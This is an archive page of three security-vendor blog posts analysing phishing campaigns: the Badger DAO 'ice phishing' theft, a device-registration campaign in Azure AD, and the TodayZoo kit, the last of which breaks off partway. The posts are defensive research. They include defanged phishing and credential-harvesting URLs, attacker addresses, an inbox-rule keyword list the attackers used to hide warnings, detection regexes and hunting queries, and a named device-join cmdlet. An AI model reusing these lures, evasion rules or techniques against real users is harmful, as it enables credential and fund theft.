Archive

Archive for the ‘phishing’ Category

‘Ice phishing’ on the blockchain

The technologies that connect us are continually advancing, and while this brings tremendous new capabilities to users, it also opens new attack surfaces for adversaries and abusers. Social engineering represents a class of threats that has extended to virtually every technology that enables human connection. Our recent analysis of a phishing attack connected to the blockchain reaffirms the durability of these threats as well as the need for security fundamentals to be built into related future systems and frameworks.

Credential phishing haunts our customers day in and day out in the web2 world, which is the version of the internet that most of us are familiar with and use today. It’s a profitable business for cybercriminals, even if margins are slim and there’s significant risk associated with monetizing credentials to a business (for example, through human-operated ransomware attacks). Now, imagine if an attacker can – single-handedly – grab a big chunk of the nearly 2.2 trillion US dollar cryptocurrency market capitalization and do so with almost complete anonymity. This changes the dynamics of the game and is exactly what’s happening in the web3 world multiple times a month.

Web3 is the decentralized world that is built on top of cryptographic security that lays the foundation of the blockchain (in contrast, web2 is the more centralized world). In web3, funds you hold in your non-custodial wallet are secured by the private key that is only known to you. Smart contracts you interact with are immutable, often open-source, and audited. How do phishing attacks happen with such a secure foundation?

This is what we will explore in this blog. We will share some necessary background information, and then dive into the Badger DAO attack, a phishing attack that occurred in November-December 2021, during which the attacker was able to steal approximately 121 million US dollars from users.

The Badger DAO attack highlights the need to build security into web3 while it is in its early stages of evolution and adoption. At a high level, we recommend that software developers increase security usability of web3. In the meantime, end users need to explicitly verify information through additional resources, such as reviewing the projects documentation and external reputation/informational web sites.

Overview: Web3 concepts

To dissect the attack, we need the necessary background.

Blockchain

The blockchain is a distributed ledger secured by cryptographic algorithms. It can be thought of as a database that shows transfers of cryptocurrency coins from one account to another. The largest blockchains by market capitalization today are Bitcoin and Ethereum. Transactions you submit to a blockchain may modify the ledger, for instance, by transferring cryptocurrency coins from your account to another account.

Blockchains are public, meaning all transactions are visible publicly. Blockchain web front ends (e.g., https://etherscan.io/ for the Ethereum blockchain) exist to explore transactions, accounts, and smart contracts.

Accounts and non-custodial wallets

Accounts are associated with the cryptocurrency coins you may hold. On the blockchain this is represented by an entry in the ledger that transfers cryptocurrency coins from one account to your account. From a set of such entries you can derive account balances.

Wallets visualize the cryptocurrency coins associated with your account. Contrary to popular belief, wallets actually do not hold your cryptocurrency coins. Cryptocurrency coins are stored on the distributed ledger, i.e., the blockchain. A wallet allows you to use its cryptographic keys to sign transactions that take action (e.g., transfer to another account) on the cryptocurrency coins associated with your account. In other words, your cryptographic keys give you access to your cryptocurrency coins. Disclose that key to a different party and your funds may be transferred without your consent.

There are two types of wallets – custodial wallets and non-custodial wallets. The former are wallets associated with cryptocurrency exchanges, whereas the latter is a wallet local to your device. The big difference between the two is who has access and manages the cryptographic keys to sign transactions. Non-custodial wallets provide the owner access to the cryptographic keys, whereas custodial wallets do not.

Smart contracts

Smart contracts are code deployed on the blockchain that can hold cryptocurrency coins and transact . Smart contracts only execute when a regular account (also called externally owned account (EOA)) or another smart contract triggers its execution.

Smart contract front ends

Triggering the execution of smart contracts is not trivial. One has to (1) create a valid transaction populating its fields appropriately, (2) sign the transaction with one’s private key, and (3) submit the transaction to the blockchain. In order to increase usability, smart contract providers often create a smart contract front end so users can interact with the smart contract using familiar tools, such as a browser (with a non-custodial wallet plugin.) In the security context, one must consider the entire front-end stack, including content distribution services.

ERC-20 tokens

ERC-20 tokens are special types of cryptocurrency coins (i.e., tokens) that are implemented via an ERC-20 smart contract, essentially as a balance sheet with a set of functions that allow the transfer of these tokens from one account to another. Each ERC-20 token has its own smart contract that implements the ERC-20 token standard. For example, LINK is a token.

In order to transfer tokens from one account to another, the sender of the transaction needs to be approved to transfer those tokens. The owner of the token is automatically approved for those transactions, but the owner can also delegate approval to additional entities, like smart contracts, so those smart contracts can move funds on behalf of a user. This is required for decentralized finance (DeFi) smart contracts, such as decentralized exchanges (DEXes), as these are used to exchange tokens of different types (e.g., LINK for USDC token on Uniswap V3 DEX).

Decentralized exchange (DEX)

A decentralized exchange (DEX) allows you to trade cryptocurrencies while owning your private key, thus keeping full control of your cryptocurrency. Hardware wallets can be used with DEXs, giving users a higher level of security for a user’s private keys.

Phishing attacks

There are multiple types of phishing attacks in the web3 world. The technology is still nascent, and new types of attacks may emerge. Some attacks look similar to traditional credential phishing attacks observed on web2, but some are unique to web3. One aspect that the immutable and public blockchain enables is complete transparency, so an attack can be observed and studied after it occurred. It also allows assessment of the financial impact of attacks, which is challenging in traditional web2 phishing attacks.

Recall that with the cryptographic keys (usually stored in a wallet), you hold the key to your cryptocurrency coins. Disclose that key to an unauthorized party and your funds may be moved without your consent. Stealing these keys is analogous to stealing credentials to web2 accounts. Web2 credentials are usually stolen by directing users to an illegitimate web site (e.g., a site posing as your bank) through a set of phishing emails.

While attackers can utilize a similar tactic on web3 to get to your private key, given the current adoption, the likelihood of an email landing on the inbox of a cryptocurrency user is relatively low. Instead, different tactics can be employed to reach and trick cryptocurrency users into giving up their private key:

  • Monitoring social media for users reaching out to wallet software support and jumping in with direct messages spoofing support to steal one’s private key directly2
  • Distributing new tokens for free to a set of accounts (i.e., “Airdrop” tokens), and then failing transactions on those tokens with an error message to redirect to a phishing website6 or a website that installs coin mining plugins that steal your credentials from your local device3
  • Typosquatting and impersonating legitimate smart contract front ends4
  • Impersonating wallet software and stealing private keys directly

The ‘ice phishing’ technique we discuss in this post doesn’t involve stealing one’s private keys. Rather, it entails tricking a user into signing a transaction that delegates approval of the user’s tokens to the attacker. This is a common type of transaction that enables interactions with DeFi smart contracts, as those are used to interact with the user’s tokens (e.g., swaps) as shown in Figure 1. Figure 2 and 3 show what the approval can look like. In this example, we show the initial approval (step 1 in Figure 1), interface, and transaction signature requests that are needed for the Uniswap DEX to exchange USDC tokens for LINK tokens. Note that the spender in the legitimate request is 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45 (the Uniswap V3: Router 2). Once the approval has been granted, it permits the Uniswap V3: Router 2 smart contract to transfer USDC tokens on the user’s behalf to execute the swap (steps 3 and 4 in Figure 1).

Diagram showing an example of a Uniswap flow
Figure 1. Uniswap example flow
Screenshot of a Uniswap approval interface, and screenshot of Approval transaction signature request.
Figure 2. Uniswap approval interface. Figure 3. Approval transaction signature request.

In an ‘ice phishing’ attack, the attacker merely needs to modify the spender address to attacker’s address. This can be quite effective as the user interface doesn’t show all pertinent information that can indicate that the transaction has been tampered with. In the example above, a user isn’t able to tell whether the account to be authorized 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45 (shown in Figure 3) is indeed the Uniswap V3: Router 2 or an address controlled by the attacker.

Once the approval transaction has been signed, submitted, and mined, the spender can access the funds. In case of an ‘ice phishing’ attack, the attacker can accumulate approvals over a period of time and then drain all victim’s wallets quickly.

This is exactly what happened with the Badger DAO attack that enabled the attacker to drain millions of US dollars in November-December 2021.

Badger DAO attack

Badger is a DeFi protocol that allows one to earn interest on Bitcoin deposits; it launched on Ethereum mainnet in December 2020. Users deposit wrapped Bitcoin into vaults that earn yield through a variety of yield farming strategies. Badger currently has 978 million US dollars total volume locked (TVL).

Figure 4 shows the timeline of the Badger DAO attack. Badger smart contract front-end infrastructure (in particular, its Cloudflare portion) was compromised (gaining access to a Cloudflare API key), allowing the attacker to inject malicious script into the Badger smart contract front end. This script requested users to sign transactions granting ERC-20 approvals to the attacker’s account (0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107). Note that based on blockchain explorer etherscan, the attacker’s account has been active since 2018 and associated with a variety of phishing-related attacks and cryptocurrency scams (e.g., this transaction hash).

The script was first injected into app.Badger.com on November 10, 2021, but injection was inconsistent, only targeting wallets with certain balance and modifying the script periodically. Injection stopped on December 2, 2021 at 12:31:37 AM (UTC).

On November 21, 2021, the first funds were transferred by the attacker (possibly a test transaction). On December 2, 2021 at 12:48:25 AM, actual funds were drained from victims’ accounts. This draining of funds continued until 10:35:37 AM that day. Badger paused contracts (where possible) starting at 03:14:00 AM, causing some of the attacker’s transactions to fail. In the end, the attacker was able to drain 121 million US dollars from almost 200 accounts within 10 hours.

Diagram showing the Badger DAO timeline, outlining attacker's actions, the victims' action, the Badger DAO's actions, and the Forta Agent detections.
Figure 4. Badger DAO attack timeline

Detections using Forta

The web3 stack is still nascent and bares risks for users. This ‘ice phishing’ attack was unprecedented in the amount of funds stolen. It currently ranks 6th in the rekt leaderboard of most expensive crypto hacks. Note that funds drained were mostly from user wallets as opposed to Badger DAO’s smart contracts.

While Badger proceeded with a postmortem and actions to secure infrastructure and unpause contracts6, attacks like these will likely continue. Fortunately, transactions on the blockchain are public, allowing the identification of these sorts of attacks as early as possible and in an automated way.

Learning from the Badger DAO attack and in order to better detect similar attacks in the future, we have authored and open-sourced an agent on Forta, a real-time threat detection platform for smart contracts. Forta pipes blockchain transactions to the agent for analysis. Our agent monitors transactions for phishing attacks in two stages:

  1. A suspicious ERC-20 approval detector that triggers when an EOA address was granted approvals to multiple ERC-20 contracts. This step of the agent essentially identifies the preparation step (token approvals) of the ‘ice phishing’ attack.
  2. A suspicious ERC-20 transfer detector that triggers when an incriminated EOA address starts transferring funds. This step of the agent alerts when funds are drained from user’s wallets.

Executing the detector on the blocks involved in the Badger DAO attack (block 13650638-13726863) would have created the two alerts shown below. These alerts would have been raised well before the attack was noticed manually, as shown in Figure 4. Smart contract providers are able to subscribe to these alerts and possibly integrate into automated response processes (e.g., pausing smart contracts or disabling the smart contract web front-end) via the Forta Explorer, OpenZeppelin’s Defender, or other means. The alerts provide actionable information that can quickly allow incident responders to identify and investigate attacker’s transactions. For instance, transaction 0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7 shows attacker 0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 was granted approval for bSLP token (smart contract 0x88128580acdd9c04ce47afce196875747bf2a9f6) by victim 0xc610d02270c39a0581fe0137f5e93ae5053d3c66.

Alert 2 on 0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7 on Nov 20th 2021 08:59:06AM {
  "name": "Suspicious ERC-20 EOA Approvals",
  "description": "0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 was granted approvals to 2 ERC-20 contracts",
  "alertId": "PHISHING-SUS-ERC20-EOA-APPROVALS",
  "protocol": "ethereum",
  "severity": "High",
  "type": "Suspicious",
  "metadata": {
    "last_contract": "0x88128580acdd9c04ce47afce196875747bf2a9f6",
    "last_tx_hash": "0x3cad03b779572c11c8188d9660d39ba76d5ae20ec254df89df9c79b5874d17f7",
    "last_victim": "0xc610d02270c39a0581fe0137f5e93ae5053d3c66",
    "uniq_approval_contract_count": 2
  }
} 

Alert 2 on 0xccc9ea1cbe146e274aff202722307b1443b781af67363bf2f256e0cc39cc1d0a on Nov 21st 2021 11:32:30AM {
  "name": "ERC-20 Transfer by Suspicious Account",
  "description": "0x1fcdb04d0c5364fbd92c73ca8af9baa72c269107 transferred funds from 0x6def55d2e18486b9ddfaa075bc4e4ee0b28c1545 contract to address 0x91d65d67fc573605bcb0b5e39f9ef6e18afa1586",
  "alertId": "PHISHING-SUS-ERC20-EOA-TRANSFERS",
  "protocol": "ethereum",
  "severity": "Critical",
  "type": "Exploit",
  "metadata": {
    "last_contract": "0x6def55d2e18486b9ddfaa075bc4e4ee0b28c1545",
    "last_attacker_address": "0x91d65D67FC573605bCb0b5E39F9ef6E18aFA1586",
    "last_tx_hash": "0xccc9ea1cbe146e274aff202722307b1443b781af67363bf2f256e0cc39cc1d0a",
    "last_victim": "0x38b8F6af1D55CAa0676F1cbB33b344d8122535C2"
  }
}

Recommendations

Here are some recommendations end users could follow to protect themselves against threats like the Badger DAO attack. Note that these recommendations put a lot of burden on the users; we encourage web3 projects and wallet providers to increase usability to help users perform these actions:

  1. Review the smart contract you are interacting with.
  2. Is the contract address correct? Unfortunately, one can’t rely on the smart contract front-end to interact with the right smart contract. One needs to check the contract address that appears in the transaction to be signed before it is submitted. This is an area where wallet providers can innovate and add a layer of security.
  3. Has the smart contract been audited? Several web sites can help with that assessment, such as defiyield.
  4. Is the contract upgradable (in other words, is it implemented as a proxy pattern) such that when bugs are uncovered, the project can deploy fixes? Etherscan’s contract tab shows whether smart contract has been implemented as a proxy.
  5. Does the smart contract have incident response or emergency capabilities, like pause/ unpause? Under what conditions are these triggered?
  6. What are the security characteristics of the smart contract after deployment? CertiK Skynet tracks post-deployment security intelligence through on-chain monitoring.
  7. Manage your crypto currencies and tokens through multiple wallets and/or periodically review and revoke token allowances. https://etherscan.io/tokenapprovalchecker makes doing this easy.

For project developers, smart contract audits are a necessary first step, but audits need to expand to the entire infrastructure and incident response processes. After deployment, monitoring (e.g., through Forta or CertiK) may give you the time to prevent or limit an exploit draining funds. Lastly, we recommend ensuring that all your audit and security incident response processes are documented in a dedicated section on the project’s website.

The ‘ice phishing’ attack in late 2021 that we analyzed in this blog is just one example of the threats affecting the blockchain technology today. Since then, many more hacks have occurred that impacted blockchain projects and users. In this blog we identified possible ways to identify these attacks quickly and enumerated a set of security practices that project developers and users can follow. Blockchain technology is developing rapidly, and with broader adoption in the horizon, we encourage researchers to continue examining this emerging tech, sharing findings with the broader community, and helping improve security through both secure code and informed security products.

Christian Seifert
Microsoft 365 Defender Research Team

Further reading

  1. Web2 vs Web3
  2. Common scams and how to avoid them
  3. Hunting Huobi, MyEtherWallet, and Blockchain.info Scams
  4. Read that link carefully: Scammers scoop up misspelled cryptocurrency URLs to rob your wallet
  5. Update: Transaction Error Messages
  6. Phisher Watch: Airdrop Scams
  7. BadgerDAO Exploit Technical Post Mortem

The post ‘Ice phishing’ on the blockchain appeared first on Microsoft Security Blog.

Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA

We have recently uncovered a large-scale, multi-phase campaign that adds a novel technique to traditional phishing tactics by joining an attacker-operated device to an organization’s network to further propagate the campaign. We observed that the second stage of the campaign was successful against victims that did not implement multifactor authentication (MFA), an essential pillar of identity security. Without additional protective measures such as MFA, the attack takes advantage of the concept of bring-your-own-device (BYOD) via the ability to register a device using freshly stolen credentials.

The first campaign phase involved stealing credentials in target organizations located predominantly in Australia, Singapore, Indonesia, and Thailand. Stolen credentials were then leveraged in the second phase, in which attackers used compromised accounts to expand their foothold within the organization via lateral phishing as well as beyond the network via outbound spam.

Connecting an attacker-controlled device to the network allowed the attackers to covertly propagate the attack and move laterally throughout the targeted network. While in this case device registration was used for further phishing attacks, leveraging device registration is on the rise as other use cases have been observed. Moreover, the immediate availability of pen testing tools, designed to facilitate this technique, will only expand its usage across other actors in the future.

MFA, which prevents attackers from being able to use stolen credentials to gain access to devices or networks, foiled the campaign for most targets. For organizations that did not have MFA enabled, however, the attack progressed.

Diagram showing the multi-phase phishing attack chain
Figure 1. Multi-phase phishing attack chain

Phishing continues to be the most dominant means for attacking enterprises to gain initial entry. This campaign shows that the continuous improvement of visibility and protections on managed devices has forced attackers to explore alternative avenues. The potential attack surface is further broadened by the increase in employees who work-from-home which shifts the boundaries between internal and external corporate networks. Attackers deploy various tactics to target organizational issues inherent with hybrid work, human error, and “shadow IT” or unmanaged apps, services, devices, and other infrastructure operating outside standard policies.

These unmanaged devices are often ignored or missed by security teams at join time, making them lucrative targets for compromising, quietly performing lateral movements, jumping network boundaries, and achieving persistence for the sake of launching broader attacks. Even more concerning, as our researchers uncovered in this case, is when attackers manage to successfully connect a device that they fully operate and is in their complete control.

To fend off the increasing sophistication of attacks as exemplified by this attack, organizations need solutions that deliver and correlate threat data from email, identities, cloud, and endpoints. Microsoft 365 Defender coordinates protection across these domains, automatically finding links between signals to provide comprehensive defense. Through this cross-domain visibility, we were able to uncover this campaign. We detected the anomalous creation of inbox rules, traced it back to an initial wave of phishing campaign, and correlated data to expose the attackers’ next steps, namely device registration and the subsequent phishing campaign.

Screenshot of Microsoft 365 Defender alert for Suspicious device registration following phishing
Figure 2. Microsoft 365 Defender alert “Suspicious device registration following phishing”

This attack shows the impact of an attacker-controlled unmanaged device that may become part of a network when credentials are stolen and Zero Trust policies are not in place. Microsoft Defender for Endpoint provides a device discovery capability that helps organizations to find certain unmanaged devices operated by attackers whenever they start having network interactions with servers and other managed devices. Once discovered and onboarded, these devices can then be remediated and protected.

Screenshot of Microsoft Defender for Endpoint device discovery page
Figure 3. Microsoft Defender for Endpoint device discovery

In this blog post, we share the technical aspects of a large-scale, multi-phase phishing campaign. We detail how attackers used the first attack wave to compromise multiple mailboxes throughout various organizations and implement an inbox rule to evade detection. This was then followed by a second attack wave that abused one organization’s lack of MFA protocols to register the attackers’ unmanaged device and propagate the malicious messages via lateral, internal, and outbound spam.

First wave and rule creation

The campaign leveraged multiple components and techniques to quietly compromise accounts and propagate the attack. Using Microsoft 365 Defender threat data, we found the attack’s initial compromise vector to be a phishing campaign. Our analysis found that the recipients received a DocuSign-branded phishing email, displayed below:

Screenshot of a sample email used in the first stage of the attack
Figure 4. First-stage phishing email spoofing DocuSign

The attacker used a set of phishing domains registered under .xyz top-level domain. The URL domain can be described with the following regular expression syntax:

UrlDomain matches regex @”^[a-z]{5}\.ar[a-z]{4,5}\.xyz”

The phishing link was uniquely generated for each email, with the victim’s email address encoded in the query parameter of the URL. After clicking the link, the victim was redirected to a phishing website at newdoc-lnpye[.]ondigitalocean[.]app, which imitated the login page for Office 365. The fake login page was pre-filled with the targeted victim’s username and prompted them to enter their password. This technique increased the likelihood that the victim viewed the website as being legitimate and trustworthy.

Screenshot of the phishing page showing the username prepopulated
Figure 5. Phishing page with username prepopulated

Next, we detected that the victim’s stolen credentials were immediately used to establish a connection with Exchange Online PowerShell, most likely using an automated script as part of a phishing kit. Leveraging the Remote PowerShell connection, the attacker implemented an inbox rule via the New-InboxRule cmdlet that deleted certain messages based on keywords in the subject or body of the email message. The inbox rule allowed the attackers to avoid arousing the compromised users’ suspicions by deleting non-delivery reports and IT notification emails that might have been sent to the compromised user.

During our investigation of the first stage of this campaign, we saw over one hundred compromised mailboxes in multiple organizations with inbox rules consistently fitting the pattern below:

Mailbox rule name Condition Action
Spam Filter SubjectOrBodyContainsWords: “junk;spam;phishing;hacked;password;with you”   DeleteMessage, MarkAsRead

While multiple users within various organizations were compromised in the first wave, the attack did not progress past this stage for the majority of targets as they had MFA enabled. The attack’s propagation heavily relied on a lack of MFA protocols. Enabling MFA for Office 365 applications or while registering new devices could have disrupted the second stage of the attack chain.

Device registration and second wave phishing

One account belonging to an organization without MFA enabled was further abused to expand the attackers’ foothold and propagate the campaign. More specifically, the attack abused the organization’s lack of MFA enforcement to join a device to its Azure Active Directory (AD) instance, or possibly to enroll into a management provider like Intune to enforce the organization’s policies based on compliant devices.

In this instance, the attackers first installed Outlook onto their own Windows 10 machine. This attacker-owned device was then successfully connected to the victim organization’s Azure AD, possibly by simply accepting Outlook’s first launch experience prompt to register the device by using the stolen credentials. An Azure AD MFA policy would have halted the attack chain at this stage. Though for the sake of comprehensiveness, it should be noted that some common red team tools, such as AADInternals and the command Join-AADIntDeviceToAzureAD, can be used to achieve similar results in the presence of a stolen token and lack of strong MFA policies.

Azure AD evaluates and triggers an activity timestamp when a device attempts to authenticate, which can be reviewed to discover freshly registered devices. In our case, this includes a Windows 10 device either Azure AD joined or hybrid Azure AD joined and active on the network. The activity timestamp can be found by either using the Get-AzureADDevice cmdlet or the Activity column on the devices page in the Azure portal. Once a timeframe is defined and a potential rogue device is identified, the device can be deleted from Azure AD, preventing access to resources using the device to sign in.

The creation of the inbox rule on the targeted account coupled with the attackers’ newly registered device meant that they were now prepared to launch the second wave of the campaign. This second wave appeared to be aimed at compromising additional accounts by sending lateral, internal, and outbound phishing messages.

By using a device now recognized as part of the domain coupled with a mail client configured exactly like any regular user, the attacker gained the ability to send intra-organizational emails that were missing many of the typical suspect identifiers. By removing enough of these suspicious message elements, the attacker thereby significantly expanded the success of the phishing campaign.

To launch the second wave, the attackers leveraged the targeted user’s compromised mailbox to send malicious messages to over 8,500 users, both in and outside of the victim organization. The emails used a SharePoint sharing invitation lure as the message body in an attempt to convince recipients that the “Payment.pdf” file being shared was legitimate.

Screenshot of a sample email used in the second stage of the phishing campaign
Figure 6. Second-stage phishing email spoofing SharePoint

Like the first stage of the campaign, we found that the URL used in the second wave phishing emails matched the first’s wave structure and also redirected to the newdoc-lnpye[.]ondigitalocean[.]app phishing website imitating the Office 365 login page. Victims that entered their credentials on the second stage phishing site were similarly connected with Exchange Online PowerShell, and almost immediately had a rule created to delete emails in their respective inboxes. The rule had identical characteristics to the one created during the campaign’s first stage of attack.

Generally, the vast majority of organizations enabled MFA and were protected from the attackers’ abilities to propagate the attack and expand their network foothold. Nonetheless, those that do not have MFA enabled could open themselves up to being victimized in potential future attack waves. 

Remediating device persistence: when resetting your password is not enough

Analysis of this novel attack chain and the additional techniques used in this campaign indicates that the traditional phishing remediation playbook will not be sufficient here. Simply resetting compromised accounts’ passwords may ensure that the user is no longer compromised, but it will not be enough to eliminate ulterior persistence mechanisms in place.

Careful defenders operating in hybrid networks need to also consider the following steps:

If these additional remediation steps are not taken, the attacker could still have valuable network access even after successfully resetting the password of the compromised account. An in-depth understanding of this attack is necessary to properly mitigate and defend against this new type of threat.

Defending against multi-staged phishing campaigns

The latest Microsoft Digital Defense Report detailed that phishing poses a major threat to both enterprises and individuals, while credential phishing was leveraged in many of the most damaging attacks in the last year. Attackers targeting employee credentials, particularly employees with high privileges, typically use the stolen data to sign into other devices and move laterally inside the network. The phishing campaign we discussed in this blog exemplifies the increasing sophistication of these attacks.

In order to disrupt attackers before they reach their target, good credential hygiene, network segmentation, and similar best practices increase the “cost” to attackers trying to propagate through the network. These best practices can limit an attacker’s ability to move laterally and compromise assets after initial intrusion and should be complemented with advanced security solutions that provide visibility across domains and coordinate threat data across protection components.

Organizations can further reduce their attack surface by disabling the use of basic authentication, enabling multi-factor authentication for all users, and requiring multi-factor authentication when joining devices to Azure AD. Microsoft 365 global admins can also disable Exchange Online PowerShell for individual or multiple end users via a list of specific users or filterable attributes, assuming that the target accounts all share a unique filterable attribute such as Title or Department. For additional security, customers can enforce our new Conditional Access (CA) control requiring MFA to register devices, which can be combined with other CA conditions like device platform or trusted networks.

Microsoft 365 Defender correlates the alerts and signals related to initial phishing generated by suspicious inbox rule creation as well as suspicious device registration into a single easy to comprehend Incident.

Screenshot of Microsoft 365 Defender incident view showing suspicious device registration and inbox rule
Figure 7. Microsoft 365 Defender incident with suspicious device registration and inbox rule

Microsoft Defender for Office 365 protects against email threats using its multi-layered email filtering stack, which includes edge protection, sender intelligence, content filtering, and post-delivery protection, in addition to including outbound spam filter policies to configure and control automatic email forwarding to external recipients. Moreover, Microsoft Defender for Office 365 uses Safe Links feature to proactively protect users from malicious URLs in internal messages or in an Office document at time of click. Safe Links feature to proactively protect users from malicious URLs in internal messages or in an Office document at time of click.

Advanced hunting queries

Hunting for emails with phishing URL

let startTime = ago(7d);
let endTime = now();
EmailUrlInfo
| where Timestamp between (startTime..endTime)
| where UrlDomain matches regex @"^[a-z]{5}\.ar[a-z]{4,5}\.xyz"
| project NetworkMessageId,Url
| join (EmailEvents 
| where Timestamp between (startTime..endTime))
on NetworkMessageId

Hunting for suspicious Inbox Ruleslet startTime = ago(7d);

// Hunting for suspicious Inbox Rules
let startTime = ago(7d);
let endTime = now();
CloudAppEvents
| where Timestamp between(startTime .. endTime)
| where ActionType == "New-InboxRule"
| where RawEventData contains "Spam Filter"
| where RawEventData has_any("junk","spam","phishing","hacked","password","with you") 
| where RawEventData contains "DeleteMessage" 
| project Timestamp, AccountDisplayName, AccountObjectId, IPAddress

Hunting for rogue device registrations

// Hunting for rogue device registrations
let startTime = ago(7d);
let endTime = now();
CloudAppEvents
| where Timestamp between(startTime .. endTime)
| where ActionType == "Add registered owner to device." 
| where RawEventData contains "notorius"
| where AccountDisplayName == "Device Registration Service"
| where isnotempty(RawEventData.ObjectId) and isnotempty(RawEventData.ModifiedProperties[0].NewValue) and isnotempty(RawEventData.Target[1].ID) and isnotempty(RawEventData.ModifiedProperties[1].NewValue)
| extend AccountUpn = tostring(RawEventData.ObjectId)
| extend AccountObjectId = tostring(RawEventData.Target[1].ID)
| extend DeviceObjectId = tostring(RawEventData.ModifiedProperties[0].NewValue)
| extend DeviceDisplayName = tostring(RawEventData.ModifiedProperties[1].NewValue)
| project Timestamp,ReportId,AccountUpn,AccountObjectId,DeviceObjectId,DeviceDisplayName

The post Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA appeared first on Microsoft Security Blog.

Franken-phish: TodayZoo built from other phishing kits

October 21st, 2021 No comments

A phishing kit built using pieces of code copied from other kits, some available for sale through publicly accessible scam sellers or are reused and repackaged by other kit resellers, provides rich insight into the state of the economy that drives phishing and email threats today. We uncovered this phishing kit while examining an extensive series of credential phishing campaigns that all sent credentials to a set of endpoints operated by the attackers.

We named the kit “TodayZoo” because of its curious use of these words in its credential harvesting component in earlier campaigns, likely a reference to phishing pages that spoofed a popular video conferencing application. Our prior research on phishing kits told us TodayZoo contained large pieces of code copied from widely circulated ones. The copied code segments even have the comment markers, dead links, and other holdovers from the previous kits.

Today’s phishing attacks operate on a landscape fueled by an evolved service-based economy filled with efficient, reliable, and profitable offerings. Attackers who wish to launch a phishing campaign may rent their resource and infrastructure needs from phishing-as-a-service (PhaaS) providers, who do the legwork for them. Alternatively, they can make a one-time purchase of a phishing kit that they can “plug and play.”

That’s not to say that attackers who build their kits from the ground up are at a disadvantage. If anything, the abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits. They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo: because of the consistency in the redirection patterns, domains, and other techniques, tactics, and procedures (TTPs) of its related campaigns, we believe that the actors behind it came across an old phishing kit template and replaced the credential harvesting part with its own exfiltration logic to make TodayZoo solely for their nefarious purposes.

Since the first observed instances of the TodayZoo phishing kit last December, large email campaigns leading to it have continued without significant pause. Our analysis of its phishing page artifacts, redirection routines, and domain generation algorithm (DGA) methods for the initial sites helps ensure Microsoft Defender for Office 365 effectively protect customers from the said campaigns.

Microsoft tracks unique phishing kits, phishing services, and other components used in phishing to better protect customers from malicious emails at a larger scale. Combined with our monitoring of individual credential campaigns and the latest evasion techniques, our research into kits and services provides us with a better understanding of the structure of phishing email messages. Such threat intelligence and insights, in turn, feed into our protection technologies, such as Defender for Office 365 and Microsoft 365 Defender.

This blog post details some of the technical aspects of a phishing campaign based on the TodayZoo kit. It also provides information about “DanceVida,” a potential parent family of kits based on a shared resource link, and how it and other historical patterns figure in TodayZoo’s code structure.

What’s in a kit?

A “phishing kit” or “phish kit” can refer to various parts of a set of software or services meant to facilitate phishing. The term refers most commonly to an archive file containing images, scripts, and HTML pages that enable an attacker to quickly set up an undetectable phishing page and collect credentials through it. However, “phishing kit” can also be used to refer specifically to the unique page itself that spoofs a brand and interacts with a user, collects the user’s credentials, and posts them to an asset the attacker owns.

Phishing kits are generally split into the following major components based on function:

  • Imitation: These components help make the login pages appear legitimate. These can include imagery to imitate welcome banners, as well as dynamically generated logos and branding that are fetched based on the target’s email address. These components may also include legitimate links and “help” or “password reset” buttons that navigate cautious users out of the page and onto legitimate sites.
  • Obfuscation: These components hide the pages’ true purpose from scanners or automated security detection systems. Obfuscation techniques can be through encoding or individual functions designed to make the extraction of resources more difficult. Obfuscation can also include anti-sandboxing resources on the page or on the site that are called to enforce geofencing, CAPTCHAs, and others.
  • Credential harvest: These components facilitate the entry, collection, and exfiltration of the credentials the target user provides. These components also include information about where said credentials are sent, how they are stored, and which sites the user is sent to after giving their credentials.

These components are seen in the TodayZoo phishing kit, which we will discuss in the following sections.

Breaking down a TodayZoo-based phishing campaign

The use of the TodayZoo phishing kit was initially seen in December 2020. Then, in March 2021, we observed a series of phishing campaigns abuse the AwsApps[.]com domain to send the email messages that eventually directed users to the final landing pages, leading us to examine the kit more closely. As of this writing, we have already notified Amazon about the abovementioned abuse in their domain, and they promptly took action.

The attackers created malicious accounts at scale. Initially, the sender emails appeared with randomly generated domain names such as wederfs76y3uwedi3uy89ewdu23ye87293eqwhduayqw[.]awsapps[.]com. This contrasts legitimate emails—and even some spoofed phishing ones—where the subdomain would represent a company hostname.

The email message itself was relatively simple: it impersonated Microsoft and leveraged a zero-point font obfuscation technique in an attempt to evade detection. For example, in the early iterations of their campaign, the attackers used the <ins></ins> tags to insert the date of the message every few characters invisibly, as shown below:

Screenshot of HTML code showing zero-point font technique

Figure 1. Example of zero-point font obfuscation to insert the date into the HTML code of the email message

The social engineering lures in the message body repeatedly changed over the months. Campaigns in April and May used password reset, while more the recent campaigns in August were leveraging fax and scanner notifications.

Screenshot of email used in this campaign

Figure 2. Example of an email lure leading to TodayZoo phishing kit

Regardless of the lure, the following attack chain is consistent, with initial and secondary redirectors, a final landing page, and a credential harvesting page. Below is a sample of TodayZoo’s attack chain URLs:

  • Initial redirector: hxxp://2124658742[.]ujsd[.]pentsweser[.]com//fhwpp8sv[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • Secondary redirector: hxxps://limestonesm[.]com/edfh.kerfq/#no-reply@microsoft[.]com
  • Final landing page: hxxps://fra1[.]digitaloceanspaces[.]com/koip/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26.html#no-reply@microsoft[.]com
  • Credential harvesting page: hxxps://nftduniya[.]com/cas/vcoominctodayq[.]php

The initial and secondary URLs are either compromised or attacker-created sites and serve as redirectors to funnel the more extensive set of URLs used in the emails to the final landing page where the phishing kit is hosted. The initial URL used infinite subdomains, a previously discussed technique that allows attackers to use a unique URL for each recipient while only purchasing or compromising one domain. The URL also leveraged malformed URLs that consisted of multiple forward slashes at the demarcation of the path, as well as the secondary URL that is encoded along with the recipient’s email address.

